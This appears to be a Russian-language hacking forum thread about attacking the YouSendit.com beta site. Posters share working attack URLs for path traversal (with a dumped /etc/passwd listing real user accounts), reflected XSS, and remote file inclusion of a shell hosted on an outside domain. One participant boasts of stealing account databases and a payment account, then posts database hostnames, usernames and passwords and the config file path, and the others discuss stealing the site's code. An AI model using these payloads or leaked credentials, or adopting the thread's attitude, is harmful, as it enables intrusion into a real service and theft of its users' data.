Уязвимости: YouSendit.com

[Winux]

Обнаружено несколько весьма мощных бага в популярном фаилхостинге YouSendit.com.


Первая довольно таки серьезная:

Спойлер

_http://beta.yousendit.com/static.php?key=../../../../../../../../etc/passwd%00

Результат:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin franck:x:500:500::/home/franck:/bin/bash khalid:x:501:501::/home/khalid:/bin/bash jan:x:502:502::/home/jan:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin thomasv:x:503:503::/home/thomasv:/bin/bash bimages:x:504:504::/home/bimages:/bin/bash

Вторая - XSS:

Спойлер: 5

_http://beta.yousendit.com/signup.php?firstname=1&lastname=1&sign-email=
%22%3E%3Cscript%3Ealert('xss.pro/')%3B%3C/script%3E&pwd1=1
&pwd2=1&gender=Male&age=13-17&agree=on

И еще одна XSS:

Спойлер: 3 у вас 60

_http://beta.yousendit.com/resend_activate.php?
email=%22%3E%3Cscript%3Ealert('xss.pro/')%3B%3C/script%3E

Надеюсь, все поняли что XSS в 1 строку надо

 

[Antivir]

Winux -пасиб.....

 

[Winux]

Вот, думал не публиковать, ну пусть будет:
удаленное подрубание шелла. Кто сможет выкачать весь двиг - респект. Кладите его сюда.

Спойлер: 3 у вас 43

_http://beta.yousendit.com/static.php?key=http://xss.pro/shell.txt?

 

[Padonakdsd]

Нашел еще часа 2 назад , слил c сайта 2 базы с акками, нашел акк payflow, вот скрин транзакций, базы в аттаче

 

[Winux]

Padonakdsd
А где ты там БД нашел. Я искал конфили для mysql но ничего не нашел.
А двиг не хочешь выкачать. Архивнуть папки у меня не получилось.
Какой шелл инклюдил, ато НФМ и РСТ косо пашут.

 

[Padonakdsd]

юзал рст, хоть и криво но пашет, пассы к бд лежат в конфиге пхп, вот они
mysql://ysi:mnmgbsieacss@wa-dbm-01.yousendit.com:3306
mysql://ysireader:mnmgbsieacss@wa-sl-1017.yousendit.com:3306

 

[Winux]

Padonakdsd
Так а где там этот конфиг, как хоть фаил то зовется.
Не пробовал архивнуть всю папку?
Хочется скрипты украсть.

 

[Padonakdsd]

конфиг лежит здесь _ /var/www/php/conf/config.php, архивировать пробовал, архив создается, но не качается, лежит тут _/tmp/a.zip, если его еще не удалили